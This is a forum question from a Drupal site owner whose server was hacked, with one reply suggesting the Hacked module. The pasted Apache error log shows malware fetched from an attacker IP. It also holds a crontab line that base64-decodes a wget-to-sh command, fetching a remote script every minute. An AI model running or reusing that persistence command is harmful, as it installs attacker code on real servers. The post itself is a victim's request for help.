# Drupla Site hacked

Tags: drupal, port80

apache server error_log:

--2018-11-14 22:13:39--  http://164.132.159.56/drupal/zps.sh
Connecting to 164.132.159.56:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 589 [text/x-sh]
Saving to: 'STDOUT'

```
 0K                                                       100%  101M=0s
```

2018-11-14 22:13:40 (101 MB/s) - written to stdout [589/589]

rm: cannot remove '/var/tmp/yum-ec2-user-_j9uM3': Operation not permitted
rm: refusing to remove '.' or '..' directory: skipping '/var/tmp/.'
rm: refusing to remove '.' or '..' directory: skipping '/var/tmp/..'
--2018-11-14 22:13:40--  http://164.132.159.56/drupal/2/olo
Connecting to 164.132.159.56:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33880 (33K)
Saving to: '/var/tmp/lew'

```
 0K .......... .......... .......... ...                  100%  286K=0.1s
```

2018-11-14 22:13:40 (286 KB/s) - '/var/tmp/lew' saved [33880/33880]

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0^M100 33880  100 33880    0     0  96119      0 --:--:-- --:--:-- --:--:-- 96250
e: No such file or directory
e: No such file or directory
e: No such file or directory

e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
sh: line 1: 22417 Done                    echo '* * * * * echo -n  "d2dldCAtTyAtIGh0dHA6Ly8xNjQuMTMyLjE1OS41Ni9kcnVwYWwvei5zaHxzaA==" | base64 -d |sh > /dev/null'
     22418 Killed                  | crontab -
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory

Please tell solution.

Comment: Getting hacked sucks... sorry to hear about your problem. That said, without more context, I am not sure anyone will be able to help you. What is the result of the hack on the front end? Are you running Drupal 6, 7 or 8 - which subversion? What have you already learned about the hack? And also, please try to keep in mind the future usefulness of this thread: the goal is to help you, and someone else that experiences a similar issue. Right now it looks like we won't be able to help you or anyone else who has the unfortunate scenario as you.

Answer (score 0):

Use Hacked module (https://www.drupal.org/project/hacked) for your site.
It will give you report for all files which has been changed recently.

You can either delete those files or resolve their coding.